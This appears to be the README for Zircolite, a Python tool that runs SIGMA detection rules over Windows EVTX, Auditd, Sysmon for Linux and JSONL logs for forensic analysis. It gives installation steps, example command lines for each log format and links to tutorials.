Standalone SIGMA-based detection tool for EVTX, Auditd, Sysmon for linux or JSONL/NDJSON Logs
Zircolite is a standalone tool written in Python 3. It allows to use SIGMA rules on MS Windows EVTX (EVTX and JSONL format), Auditd logs and Sysmon for Linux logs
- Zircolite can be used directly on the investigated endpoint (use releases) or in your forensic/detection lab
- Zircolite is fast and can parse large datasets in just seconds (check benchmarks)
Requirements / Installation
You can install dependencies with :
pip3 install -r requirements.txt
The use of evtx_dump is optional but required by default (because it is for now much faster), If you do not want to use it you have to use the
--noexternal option. The tool is provided if you clone the Zircolite repository (the official repository is here).
EVTX files :
Help is available with
zircolite.py -h. If your EVTX files have the extension “.evtx” :
python3 zircolite.py --evtx <EVTX_FOLDER/EVTX_FILE> --ruleset <Converted Sigma rules>
python3 zircolite.py --evtx sysmon.evtx --ruleset rules/rules_windows_sysmon.json
The SYSMON ruleset used here is a default one and it is for logs coming from endpoints where SYSMON installed. A generic ruleset is available too.
Auditd logs :
python3 zircolite.py --evtx <EVTX_FOLDER/EVTX_FILE> --ruleset <Converted Sigma rules> --auditd
python3 zircolite.py --evtx auditd.log --ruleset rules/rules_linux.json --auditd
Sysmon for Linux logs :
python3 zircolite.py --evtx <EVTX_FOLDER/EVTX_FILE> --ruleset <Converted Sigma rules> --sysmon4linux
python3 zircolite.py --evtx auditd.log --ruleset rules/rules_linux.json --sysmon4linux
JSONL/NDJSON files :
python3 zircolite.py --evtx <JSON_FOLDER/JSON_FILE> --ruleset rules/rules_windows_sysmon.json --jsononly
If you want to try the tool you can test with these samples :
Everything is here.
Tutorials, references and related projects
César Marín has published a tutorial in spanish here
EU ATT&CK Workshop October 2021
Michel de CREVOISIER is doing an amazing work with SIGMA, MITRE Att&ck (c) and other projects. Check his work on mapping EVTX on the MITRE Att&ck (c) framework.
The Mini-GUI can be used totally offline, it allows the user to display and search results. To know how to use the Mini-GUI, check docs here.
Zircolite has been used to perform cold-analysis (in Lab) on EVTX in multiple “real-life” situations. However, even if Zircolite has been used many times to perform analysis directly on a Microsoft Windows endpoint, there is not yet a pipeline to thoroughly test every release.